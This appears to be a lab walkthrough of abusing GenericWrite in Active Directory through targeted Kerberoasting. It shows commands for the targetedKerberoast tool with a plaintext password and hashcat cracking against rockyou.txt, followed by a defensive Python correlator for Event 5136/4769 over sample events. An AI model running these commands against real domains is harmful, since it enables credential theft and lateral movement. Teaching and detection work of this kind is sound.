GenericWrite on User (Hugo -> Ramon)

  • Having just set Hugo.Chavez's password, we will now abuse the GenericWrite that hugo.Chavez holds over Ramon.Maldonado.

  • GenericWrite on a user can be abused in three different ways:

    • Shadow Credentials (Windows Server 2016 or later)

    • Targeted Kerberoasting (the password must be weak enough to be cracked)

    • Logon script (this needs the user to log on and, to be honest, it never worked for me unless a script was already inside SYSVOL)

Target Kerberoasting

  • First let's do a targeted Kerberoasting; the principle is simple: add an SPN to the user, request a TGS for it, then remove the SPN from the user.

  • The TGS can then be cracked offline just like in a classic Kerberoasting.

  • Shutdown has written a tool that does all the work for you: https://github.com/ShutdownRepo/targetedKerberoast

Install targetedKerberoast.py

git clone https://github.com/ShutdownRepo/targetedKerberoast
cd targetedKerberoast
python3 targetedKerberoast.py

Get The Hash

python3 targetedKerberoast.py -v -d newyork.local -u hugo.Chavez -p 123456 --request-user Ramon.Maldonado

Crack the hash with rockyou.txt

hashcat -m 13100 -a 0 maldonado.hash rockyou.txt --force
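From the blue-team side (an added note, not part of the original walkthrough), the add-SPN / request-TGS / remove-SPN sequence leaves a tight cluster in the Security log: a servicePrincipalName write (Event 5136, which requires directory-service-changes auditing and a SACL on the object), a service ticket request whose Service Name is that user (Event 4769, usually with RC4 etype 0x17), and a second servicePrincipalName write deleting the value, all within minutes. The Python below correlates that pattern over constructed sample events; the flat event dicts are an assumed simplification of the parsed log fields.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the original page), simplified from the
# Windows Security log. 5136 = directory object modified (Operation Type
# %%14674 = value added, %%14675 = value deleted, needs a SACL on the object);
# 4769 = service ticket requested (etype 0x17 = RC4-HMAC).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 5136, "target": "Ramon.Maldonado",
     "attr": "servicePrincipalName", "op": "%%14674", "actor": "hugo.Chavez"},
    {"time": "2024-05-01T10:00:05", "id": 4769, "target": "Ramon.Maldonado",
     "etype": "0x17", "actor": "hugo.Chavez"},
    {"time": "2024-05-01T10:00:09", "id": 5136, "target": "Ramon.Maldonado",
     "attr": "servicePrincipalName", "op": "%%14675", "actor": "hugo.Chavez"},
    # benign: an admin registers an SPN on a service account and leaves it
    {"time": "2024-05-01T11:00:00", "id": 5136, "target": "svc_sql",
     "attr": "servicePrincipalName", "op": "%%14674", "actor": "Administrator"},
]
SPN_ADDED, SPN_DELETED = "%%14674", "%%14675"

def _spn_change(e, op):
    return e["id"] == 5136 and e.get("attr") == "servicePrincipalName" \
        and e.get("op") == op

def find_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """One alert per (target, SPN add) where a service ticket for that
    account was requested and the SPN removed again inside `window`."""
    by_target = {}
    for e in sorted(events, key=lambda e: e["time"]):
        by_target.setdefault(e["target"], []).append(e)
    alerts = []
    for target, evs in by_target.items():
        for add in (e for e in evs if _spn_change(e, SPN_ADDED)):
            t0 = datetime.fromisoformat(add["time"])
            later = [e for e in evs
                     if t0 <= datetime.fromisoformat(e["time"]) <= t0 + window]
            tgs = [e for e in later if e["id"] == 4769]
            if tgs and any(_spn_change(e, SPN_DELETED) for e in later):
                alerts.append({"target": target, "actor": add["actor"],
                               "rc4_ticket": any(e.get("etype") == "0x17"
                                                 for e in tgs)})
    return alerts

if __name__ == "__main__":
    for a in find_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"targeted kerberoast suspected: {a['target']} by {a['actor']}"
              f" (RC4 ticket: {a['rc4_ticket']})")
```

The short-lived SPN on an account that never had one is the discriminating signal; an SPN that is added and kept, as on the svc_sql sample, is not flagged.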
